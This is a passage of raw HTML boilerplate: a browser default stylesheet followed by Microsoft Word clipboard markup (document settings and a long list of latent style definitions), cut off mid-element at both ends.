-webkit-margin-end: 0; font-weight: bold } h3 { display: block; font-size: 1.17em; -webkit-margin-before: 1__qem; -webkit-margin-after: 1em; -webkit-margin-start: 0; -webkit-margin-end: 0; font-weight: bold } h4 { display: block; -webkit-margin-before: 1.33__qem; -webkit-margin-after: 1.33em; -webkit-margin-start: 0; -webkit-margin-end: 0; font-weight: bold } h5 { display: block; font-size: .83em; -webkit-margin-before: 1.67__qem; -webkit-margin-after: 1.67em; -webkit-margin-start: 0; -webkit-margin-end: 0; font-weight: bold } h6 { display: block; font-size: .67em; -webkit-margin-before: 2.33__qem; -webkit-margin-after: 2.33em; -webkit-margin-start: 0; -webkit-margin-end: 0; font-weight: bold } table { display: table; border-collapse: separate; border-spacing: 2px; border-color: gray } thead { display: table-header-group; vertical-align: middle; border-color: inherit } tbody { display: table-row-group; vertical-align: middle; border-color: inherit } tfoot { display: table-footer-group; vertical-align: middle; border-color: inherit } table > tr { vertical-align: middle; } col { display: table-column } colgroup { display: table-column-group } tr { display: table-row; vertical-align: inherit; border-color: inherit } td, th { display: table-cell; vertical-align: inherit } th { font-weight: bold } caption { display: table-caption; text-align: -webkit-center } ul, menu, dir { display: block; list-style-type: disc; -webkit-margin-before: 1__qem; -webkit-margin-after: 1em; -webkit-margin-start: 0; -webkit-margin-end: 0; -webkit-padding-start: 40px } ol { display: block; list-style-type: decimal; -webkit-margin-before: 1__qem; -webkit-margin-after: 1em; -webkit-margin-start: 0; -webkit-margin-end: 0; -webkit-padding-start: 40px } li { display: list-item; text-align: -webkit-match-parent; } ul ul, ol ul { list-style-type: circle } ol ol ul, ol ul ul, ul ol ul, ul ul ul { list-style-type: square } dd { display: block; -webkit-margin-start: 40px } dl { display: block; -webkit-margin-before: 1__qem; -webkit-margin-after: 1em; -webkit-margin-start: 0; -webkit-margin-end: 0; } dt { display: block } ol ul, ul ol, ul ul, ol ol { -webkit-margin-before: 0; -webkit-margin-after: 0 } form { display: block; margin-top: 0__qem; } label { cursor: default; } legend { display: block; -webkit-padding-start: 2px; -webkit-padding-end: 2px; border: none } fieldset { display: block; -webkit-margin-start: 2px; -webkit-margin-end: 2px; -webkit-padding-before: 0.35em; -webkit-padding-start: 0.75em; -webkit-padding-end: 0.75em; -webkit-padding-after: 0.625em; border: 2px groove ThreeDFace; min-width: -webkit-min-content; } button { -webkit-appearance: button; } input, textarea, keygen, select, button, meter, progress { -webkit-writing-mode: horizontal-tb !important; } input, textarea, keygen, select, button { margin: 0__qem; font: -webkit-small-control; text-rendering: auto; color: initial; letter-spacing: normal; word-spacing: normal; line-height: normal; text-transform: none; text-indent: 0; text-shadow: none; display: inline-block; text-align: start; } input[type="hidden" i] { display: none } input { -webkit-appearance: textfield; padding: 1px; background-color: white; border: 2px inset; -webkit-rtl-ordering: logical; -webkit-user-select: text; cursor: auto; } input[type="search" i] { -webkit-appearance: searchfield; box-sizing: border-box; } input::-webkit-textfield-decoration-container { display: flex; align-items: center; -webkit-user-modify: read-only !important; content: none !important; } input[type="search" i]::-webkit-textfield-decoration-container { direction: ltr; } input::-webkit-clear-button { -webkit-appearance: searchfield-cancel-button; display: inline-block; flex: none; -webkit-user-modify: read-only !important; -webkit-margin-start: 2px; opacity: 0; pointer-events: none; } input:enabled:read-write:-webkit-any(:focus,:hover)::-webkit-clear-button { opacity: 1; pointer-events: auto; } input[type="search" i]::-webkit-search-cancel-button { -webkit-appearance: searchfield-cancel-button; display: block; flex: none; -webkit-user-modify: read-only !important; -webkit-margin-start: 1px; opacity: 0; pointer-events: none; } input[type="search" i]:enabled:read-write:-webkit-any(:focus,:hover)::-webkit-search-cancel-button { opacity: 1; pointer-events: auto; } input[type="search" i]::-webkit-search-decoration { -webkit-appearance: searchfield-decoration; display: block; flex: none; -webkit-user-modify: read-only !important; -webkit-align-self: flex-start; margin: auto 0; } input[type="search" i]::-webkit-search-results-decoration { -webkit-appearance: searchfield-results-decoration; display: block; flex: none; -webkit-user-modify: read-only !important; -webkit-align-self: flex-start; margin: auto 0; } input::-webkit-inner-spin-button { -webkit-appearance: inner-spin-button; display: inline-block; cursor: default; flex: none; align-self: stretch; -webkit-user-select: none; -webkit-user-modify: read-only !important; opacity: 0; pointer-events: none; } input:enabled:read-write:-webkit-any(:focus,:hover)::-webkit-inner-spin-button { opacity: 1; pointer-events: auto; } keygen, select { border-radius: 5px; } keygen::-webkit-keygen-select { margin: 0px; } textarea { -webkit-appearance: textarea; background-color: white; border: 1px solid; -webkit-rtl-ordering: logical; -webkit-user-select: text; flex-direction: column; resize: auto; cursor: auto; padding: 2px; white-space: pre-wrap; word-wrap: break-word; } ::-webkit-input-placeholder { -webkit-text-security: none; color: darkGray; pointer-events: none !important; } input::-webkit-input-placeholder { white-space: pre; word-wrap: normal; overflow: hidden; -webkit-user-modify: read-only !important; } input[type="password" i] { -webkit-text-security: disc !important; } input[type="hidden" i], input[type="image" i], input[type="file" i] { -webkit-appearance: initial; padding: initial; background-color: initial; border: initial; } input[type="file" i] { align-items: baseline; color: inherit; text-align: start !important; } input:-webkit-autofill, textarea:-webkit-autofill, select:-webkit-autofill { background-color: #FAFFBD !important; background-image:none !important; color: #000000 !important; } input[type="radio" i], input[type="checkbox" i] { margin: 3px 0.5ex; padding: initial; background-color: initial; border: initial; } input[type="button" i], input[type="submit" i], input[type="reset" i] { -webkit-appearance: push-button; -webkit-user-select: none; white-space: pre } input[type="file" i]::-webkit-file-upload-button { -webkit-appearance: push-button; -webkit-user-modify: read-only !important; white-space: nowrap; margin: 0; font-size: inherit; } input[type="button" i], input[type="submit" i], input[type="reset" i], input[type="file" i]::-webkit-file-upload-button, button { align-items: flex-start; text-align: center; cursor: default; color: ButtonText; padding: 2px 6px 3px 6px; border: 2px outset ButtonFace; background-color: ButtonFace; box-sizing: border-box } input[type="range" i] { -webkit-appearance: slider-horizontal; padding: initial; border: initial; margin: 2px; color: #909090; } input[type="range" i]::-webkit-slider-container, input[type="range" i]::-webkit-media-slider-container { flex: 1; min-width: 0; box-sizing: border-box; -webkit-user-modify: read-only !important; display: flex; } input[type="range" i]::-webkit-slider-runnable-track { flex: 1; min-width: 0; -webkit-align-self: center; box-sizing: border-box; -webkit-user-modify: read-only !important; display: block; } input[type="range" i]::-webkit-slider-thumb, input[type="range" i]::-webkit-media-slider-thumb { -webkit-appearance: sliderthumb-horizontal; box-sizing: border-box; -webkit-user-modify: read-only !important; display: block; } input[type="button" i]:disabled, input[type="submit" i]:disabled, input[type="reset" i]:disabled, input[type="file" i]:disabled::-webkit-file-upload-button, button:disabled, select:disabled, keygen:disabled, optgroup:disabled, option:disabled, select[disabled]>option { color: GrayText } input[type="button" i]:active, input[type="submit" i]:active, input[type="reset" i]:active, input[type="file" i]:active::-webkit-file-upload-button, button:active { border-style: inset } input[type="button" i]:active:disabled, input[type="submit" i]:active:disabled, input[type="reset" i]:active:disabled, input[type="file" i]:active:disabled::-webkit-file-upload-button, button:active:disabled { border-style: outset } option:-internal-spatial-navigation-focus { outline: black dashed 1px; outline-offset: -1px; } datalist { display: none } area { display: inline; cursor: pointer; } param { display: none } input[type="checkbox" i] { -webkit-appearance: checkbox; box-sizing: border-box; } input[type="radio" i] { -webkit-appearance: radio; box-sizing: border-box; } input[type="color" i] { -webkit-appearance: square-button; width: 44px; height: 23px; background-color: ButtonFace; border: 1px #a9a9a9 solid; padding: 1px 2px; } input[type="color" i]::-webkit-color-swatch-wrapper { display:flex; padding: 4px 2px; box-sizing: border-box; -webkit-user-modify: read-only !important; width: 100%; height: 100% } input[type="color" i]::-webkit-color-swatch { background-color: #000000; border: 1px solid #777777; flex: 1; min-width: 0; -webkit-user-modify: read-only !important; } input[type="color" i][list] { -webkit-appearance: menulist; width: 88px; height: 23px } input[type="color" i][list]::-webkit-color-swatch-wrapper { padding-left: 8px; padding-right: 24px; } input[type="color" i][list]::-webkit-color-swatch { border-color: #000000; } input::-webkit-calendar-picker-indicator { display: inline-block; width: 0.66em; height: 0.66em; padding: 0.17em 0.34em; -webkit-user-modify: read-only !important; opacity: 0; pointer-events: none; } input::-webkit-calendar-picker-indicator:hover { background-color: #eee; } input:enabled:read-write:-webkit-any(:focus,:hover)::-webkit-calendar-picker-indicator, input::-webkit-calendar-picker-indicator:focus { opacity: 1; pointer-events: auto; } input[type="date" i]:disabled::-webkit-clear-button, input[type="date" i]:disabled::-webkit-inner-spin-button, input[type="datetime-local" i]:disabled::-webkit-clear-button, input[type="datetime-local" i]:disabled::-webkit-inner-spin-button, input[type="month" i]:disabled::-webkit-clear-button, input[type="month" i]:disabled::-webkit-inner-spin-button, input[type="week" i]:disabled::-webkit-clear-button, input[type="week" i]:disabled::-webkit-inner-spin-button, input:disabled::-webkit-calendar-picker-indicator, input[type="date" i][readonly]::-webkit-clear-button, input[type="date" i][readonly]::-webkit-inner-spin-button, input[type="datetime-local" i][readonly]::-webkit-clear-button, input[type="datetime-local" i][readonly]::-webkit-inner-spin-button, input[type="month" i][readonly]::-webkit-clear-button, input[type="month" i][readonly]::-webkit-inner-spin-button, input[type="week" i][readonly]::-webkit-clear-button, input[type="week" i][readonly]::-webkit-inner-spin-button, input[readonly]::-webkit-calendar-picker-indicator { visibility: hidden; } select { -webkit-appearance: menulist; box-sizing: border-box; align-items: center; border: 1px solid; white-space: pre; -webkit-rtl-ordering: logical; color: black; background-color: white; cursor: default; } select:not(:-internal-list-box) { overflow: visible !important; } select:-internal-list-box { -webkit-appearance: listbox; align-items: flex-start; border: 1px inset gray; border-radius: initial; overflow-x: hidden; overflow-y: scroll; vertical-align: text-bottom; -webkit-user-select: none; white-space: nowrap; } optgroup { font-weight: bolder; display: block; } option { font-weight: normal; display: block; padding: 0 2px 1px 2px; white-space: pre; min-height: 1.2em; } select:-internal-list-box option, select:-internal-list-box optgroup { line-height: initial !important; } select:-internal-list-box:focus option:checked { background-color: -internal-active-list-box-selection !important; color: -internal-active-list-box-selection-text !important; } select:-internal-list-box option:checked { background-color: -internal-inactive-list-box-selection !important; color: -internal-inactive-list-box-selection-text !important; } select:-internal-list-box:disabled option:checked, select:-internal-list-box option:checked:disabled { color: gray !important; } select:-internal-list-box hr { border-style: none; } output { display: inline; } meter { -webkit-appearance: meter; box-sizing: border-box; display: inline-block; height: 1em; width: 5em; vertical-align: -0.2em; } meter::-webkit-meter-inner-element { -webkit-appearance: inherit; box-sizing: inherit; -webkit-user-modify: read-only !important; height: 100%; width: 100%; } meter::-webkit-meter-bar { background: linear-gradient(to bottom, #ddd, #eee 20%, #ccc 45%, #ccc 55%, #ddd); height: 100%; width: 100%; -webkit-user-modify: read-only !important; box-sizing: border-box; } meter::-webkit-meter-optimum-value { background: linear-gradient(to bottom, #ad7, #cea 20%, #7a3 45%, #7a3 55%, #ad7); height: 100%; -webkit-user-modify: read-only !important; box-sizing: border-box; } meter::-webkit-meter-suboptimum-value { background: linear-gradient(to bottom, #fe7, #ffc 20%, #db3 45%, #db3 55%, #fe7); height: 100%; -webkit-user-modify: read-only !important; box-sizing: border-box; } meter::-webkit-meter-even-less-good-value { background: linear-gradient(to bottom, #f77, #fcc 20%, #d44 45%, #d44 55%, #f77); height: 100%; -webkit-user-modify: read-only !important; box-sizing: border-box; } progress { -webkit-appearance: progress-bar; box-sizing: border-box; display: inline-block; height: 1em; width: 10em; vertical-align: -0.2em; } progress::-webkit-progress-inner-element { -webkit-appearance: inherit; box-sizing: inherit; -webkit-user-modify: read-only; height: 100%; width: 100%; } progress::-webkit-progress-bar { background-color: gray; height: 100%; width: 100%; -webkit-user-modify: read-only !important; box-sizing: border-box; } progress::-webkit-progress-value { background-color: green; height: 100%; width: 50%; -webkit-user-modify: read-only !important; box-sizing: border-box; } u, ins { text-decoration: underline } strong, b { font-weight: bold } i, cite, em, var, address, dfn { font-style: italic } tt, code, kbd, samp { font-family: monospace } pre, xmp, plaintext, listing { display: block; font-family: monospace; white-space: pre; margin: 1__qem 0 } mark { background-color: yellow; color: black } big { font-size: larger } small { font-size: smaller } s, strike, del { text-decoration: line-through } sub { vertical-align: sub; font-size: smaller } sup { vertical-align: super; font-size: smaller } nobr { white-space: nowrap } :focus { outline: auto 5px -webkit-focus-ring-color } html:focus, body:focus, input[readonly]:focus { outline: none } applet:focus, embed:focus, iframe:focus, object:focus { outline: none } input:focus, textarea:focus, keygen:focus, select:focus { outline-offset: -2px } input[type="button" i]:focus, input[type="checkbox" i]:focus, input[type="file" i]:focus, input[type="hidden" i]:focus, input[type="image" i]:focus, input[type="radio" i]:focus, input[type="reset" i]:focus, input[type="search" i]:focus, input[type="submit" i]:focus, input[type="file" i]:focus::-webkit-file-upload-button { outline-offset: 0 } a:-webkit-any-link { color: -webkit-link; text-decoration: underline; cursor: auto; } a:-webkit-any-link:active { color: -webkit-activelink } ruby, rt { text-indent: 0; } rt { line-height: normal; -webkit-text-emphasis: none; } ruby > rt { display: block; font-size: 50%; text-align: start; } ruby > rp { display: none; } noframes { display: none } frameset, frame { display: block } frameset { border-color: inherit } iframe { border: 2px inset } details { display: block } summary { display: block } summary::-webkit-details-marker { display: inline-block; width: 0.66em; height: 0.66em; -webkit-margin-end: 0.4em; } template { display: none } bdi, output { unicode-bidi: -webkit-isolate; } bdo { unicode-bidi: bidi-override; } textarea[dir=auto i] { unicode-bidi: -webkit-plaintext; } dialog:not([open]) { display: none } dialog { position: absolute; left: 0; right: 0; width: -webkit-fit-content; height: -webkit-fit-content; margin: auto; border: solid; padding: 1em; background: white; color: black } dialog::backdrop { position: fixed; top: 0; right: 0; bottom: 0; left: 0; background: rgba(0,0,0,0.1) } @page { size: auto; margin: auto; padding: 0px; border-width: 0px; } @media print { * { -webkit-columns: auto !important; } }</style><style> v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} </style> <![endif]--><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:AllowPNG/> </o:OfficeDocumentSettings> </xml><![endif]--> <link rel="themeData" href="file://localhost/Users/bengotow/Library/Caches/TemporaryItems/msoclip/0/clip_themedata.xml"> <!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>JA</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:EnableOpenTypeKerning/> <w:DontFlipMirrorIndents/> <w:OverrideTableStyleHps/> <w:UseFELayout/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="&#45;-"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="276"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" 